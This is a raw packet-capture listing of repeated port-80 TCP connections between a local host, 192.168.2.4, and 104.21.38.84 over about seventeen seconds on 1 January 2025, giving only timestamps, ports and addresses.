                                                                                                                  Jan 1, 2025 15:05:14.425607920 CET8050260104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:14.777972937 CET5026080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:14.783014059 CET8050260104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:14.866311073 CET8050260104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:14.932562113 CET5026080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.040649891 CET8050260104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.119261026 CET5026080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.178160906 CET5026080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.179864883 CET5026180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.183299065 CET8050260104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.183352947 CET5026080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.184703112 CET8050261104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.184808016 CET5026180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.184870005 CET5026180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.189701080 CET8050261104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.541207075 CET5026180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.546308041 CET8050261104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.627080917 CET8050261104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.681579113 CET5026180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.731898069 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.732369900 CET5026180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.736835003 CET8050262104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.736931086 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.737104893 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.737395048 CET8050261104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.737459898 CET5026180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.741875887 CET8050262104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.881598949 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.886440039 CET8050263104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:15.886519909 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.886639118 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:15.891413927 CET8050263104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.088433981 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.093436003 CET8050262104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.093480110 CET8050262104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.181806087 CET8050262104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.228558064 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.244556904 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.249408007 CET8050263104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.358969927 CET8050263104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.432559967 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.452773094 CET8050262104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.510710955 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.612215042 CET8050263104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.728945971 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.740984917 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.741080999 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.742371082 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.746059895 CET8050262104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.746140957 CET5026280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.746491909 CET8050263104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.746707916 CET5026380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.747231007 CET8050264104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:16.751144886 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.751298904 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:16.756088972 CET8050264104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.106714010 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.111794949 CET8050264104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.199172974 CET8050264104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.244090080 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.371377945 CET8050264104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.415973902 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.498825073 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.499586105 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.504492998 CET8050265104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.504565001 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.504657030 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.509491920 CET8050265104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.512207985 CET8050264104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.512278080 CET5026480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.853612900 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:17.858571053 CET8050265104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:17.958934069 CET8050265104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:18.008817911 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:18.211990118 CET8050265104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:18.336563110 CET5026680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:18.341536045 CET8050266104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:18.341630936 CET5026680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:18.341775894 CET5026680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:18.346623898 CET8050266104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:18.427778959 CET8050265104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:18.427937984 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:18.697309017 CET5026680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:18.702236891 CET8050266104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:18.796902895 CET8050266104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:18.931683064 CET5026680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:18.962099075 CET8050266104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.085134029 CET5026680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.086523056 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.090256929 CET8050266104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.090404034 CET5026680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.091433048 CET8050267104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.091550112 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.091720104 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.096438885 CET8050267104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.447295904 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.452248096 CET8050267104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.540837049 CET8050267104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.587858915 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.718163967 CET8050267104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.759728909 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.842717886 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.843445063 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.847750902 CET8050267104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.847805023 CET5026780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.848299980 CET8050268104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:19.848396063 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.848601103 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:19.853390932 CET8050268104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:20.198679924 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.203589916 CET8050268104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:20.302926064 CET8050268104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:20.434703112 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.584805965 CET8050268104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:20.634772062 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.710619926 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.710632086 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.715575933 CET8050269104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:20.715791941 CET8050268104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:20.718832016 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.718904972 CET5026880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.718974113 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:20.726283073 CET8050269104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.072308064 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.077255964 CET8050269104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.193517923 CET8050269104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.244107962 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.362333059 CET8050269104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.415972948 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.463840008 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.464313030 CET5027080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.468846083 CET8050269104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.468892097 CET5026980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.469172001 CET8050270104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.469238997 CET5027080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.469324112 CET5027080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.474164963 CET8050270104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.476324081 CET5027080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.477092981 CET5027180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.481846094 CET8050271104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.481908083 CET5027180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.481996059 CET5027180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.486793041 CET8050271104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.523721933 CET8050270104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.837950945 CET5027180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.842850924 CET8050271104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.850281000 CET8050270104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:21.850332022 CET5027080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:21.956979990 CET8050271104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:22.084008932 CET5027180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.223592997 CET8050271104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:22.350687027 CET5027180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.354722977 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.355798960 CET8050271104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:22.358802080 CET5027180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.359581947 CET8050272104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:22.359817028 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.359932899 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.364767075 CET8050272104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:22.714709044 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.719567060 CET8050272104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:22.825476885 CET8050272104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:22.931622982 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:22.996927977 CET8050272104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.115633965 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.120390892 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.120454073 CET8050273104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.120515108 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.120683908 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.125443935 CET8050273104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.478570938 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.483695984 CET8050273104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.601680040 CET8050273104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.650369883 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.776254892 CET8050273104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.822247982 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.898251057 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.900594950 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.903409958 CET8050273104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.903455973 CET5027380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.905424118 CET8050274104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:23.905478954 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.905563116 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:23.910366058 CET8050274104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:24.263362885 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.268352985 CET8050274104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:24.368846893 CET8050274104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:24.418901920 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.622734070 CET8050274104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:24.670753956 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.742691040 CET5027580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.742707014 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.747618914 CET8050275104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:24.747716904 CET8050274104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:24.747741938 CET5027580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.747876883 CET5027580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.747977972 CET5027480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:24.752702951 CET8050275104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.103682041 CET5027580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.108592033 CET8050275104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.192409039 CET8050275104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.375793934 CET5027580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.376131058 CET8050275104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.492167950 CET5027580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.493016005 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.497205973 CET8050275104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.497364998 CET5027580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.497883081 CET8050276104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.497945070 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.498064995 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.502815008 CET8050276104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.853677988 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:25.858616114 CET8050276104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:25.970695019 CET8050276104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.025374889 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.173249960 CET8050276104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.228507042 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.302359104 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.302366972 CET5027780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.307183027 CET8050277104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.307451010 CET8050276104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.310652971 CET5027780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.310657024 CET5027680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.310775042 CET5027780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.315593958 CET8050277104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.480086088 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.480170965 CET5027780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.485135078 CET8050278104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.485213041 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.485465050 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.490485907 CET8050278104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.527689934 CET8050277104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.598661900 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.604445934 CET8050279104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.606731892 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.612946033 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.619059086 CET8050279104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.678524017 CET8050277104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.682620049 CET5027780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.858175993 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.863048077 CET8050278104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.863306999 CET8050278104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.943242073 CET8050278104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:26.968172073 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:26.972975016 CET8050279104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.051197052 CET8050279104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.102778912 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.103526115 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.237837076 CET8050278104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.306646109 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.312241077 CET8050279104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.353508949 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.439172029 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.439234972 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.440609932 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.444225073 CET8050278104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.444271088 CET5027880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.444515944 CET8050279104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.444554090 CET5027980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.445452929 CET8050280104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.445509911 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.445875883 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.450622082 CET8050280104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.791109085 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:27.796139956 CET8050280104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:27.911288977 CET8050280104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:28.045192957 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.171077013 CET8050280104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:28.228600025 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.288603067 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.288605928 CET5028180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.293654919 CET8050281104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:28.293857098 CET8050280104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:28.296760082 CET5028080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.296762943 CET5028180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.296762943 CET5028180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.301609993 CET8050281104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:28.650533915 CET5028180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:28.655400038 CET8050281104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:28.769711018 CET8050281104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:28.822335005 CET5028180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:29.032058954 CET8050281104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:29.072264910 CET5028180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:29.190526009 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:29.197860003 CET8050282104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:29.197920084 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:29.198168993 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:29.205600977 CET8050282104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:29.573829889 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:29.578764915 CET8050282104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:29.644869089 CET8050282104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:29.697262049 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:29.912712097 CET8050282104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:29.962892056 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.038594961 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.039441109 CET5028380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.043612003 CET8050282104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:30.043665886 CET5028280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.044347048 CET8050283104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:30.044400930 CET5028380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.044480085 CET5028380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.049648046 CET8050283104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:30.402647972 CET5028380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.408641100 CET8050283104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:30.490511894 CET8050283104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:30.619203091 CET5028380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.751597881 CET8050283104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:30.838516951 CET8050283104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:30.839184999 CET5028380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.964994907 CET5028380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.964994907 CET5028180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:30.967041969 CET5028480192.168.2.4104.21.38.84
